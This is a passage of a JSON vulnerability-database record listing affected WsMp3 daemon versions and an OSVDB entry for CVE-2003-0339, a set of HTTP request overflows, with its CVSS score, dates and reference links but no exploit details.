"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_web_server:0.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wsmp3:wsmp3_daemon:0.0.10:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0339"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-05/0222.html\nISS X-Force ID: 12041\n[CVE-2003-0339](https://vulners.com/cve/CVE-2003-0339)\nBugtraq ID: 7643\n", "modified": "2003-05-21T00:00:00", "published": "2003-05-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12028", "id": "OSVDB:12028", "type": "osvdb", "title": "WsMp3 Daemon (WsMp3d) HTTP Request Multiple Overflows", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
